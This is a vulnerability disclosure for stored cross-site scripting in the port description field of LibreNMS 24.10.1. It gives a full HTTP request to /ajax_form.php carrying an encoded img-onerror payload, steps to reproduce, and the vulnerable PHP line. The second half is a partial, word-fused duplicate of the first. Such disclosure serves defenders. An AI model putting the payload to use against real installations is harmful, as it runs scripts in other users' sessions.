StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php -> param: descr
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
of Librenms version 24.10.1 (/~https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and select the "ports" section.
- In the "Description" field, enter the following payload:
"><img src onerror="alert(1)">.
- Save the changes.
- The XSS vulnerability is triggered when accessing the "ports" tab, and the payload is executed again when hovering over the modified value in the "Port" field.
Payload:
Executes:
The script execution vulnerability in the description field, as shown in the image, occurs at Line 63 of functions.inc.php
$overlib_content = '<div class=overlib><span class=overlib-text>' . $text . '</span><br />';
Impact:
Execution of Malicious Code
References
tCu0n9 Reporter
StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php-> param: descrRequest:
of Librenms version 24.10.1 (/~https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
"><img src onerror="alert(1)">.Payload:
Executes:
The script execution vulnerability in the description field, as shown in the image, occurs at Line 63 of functions.inc.php
Impact:
Execution of Malicious Code
References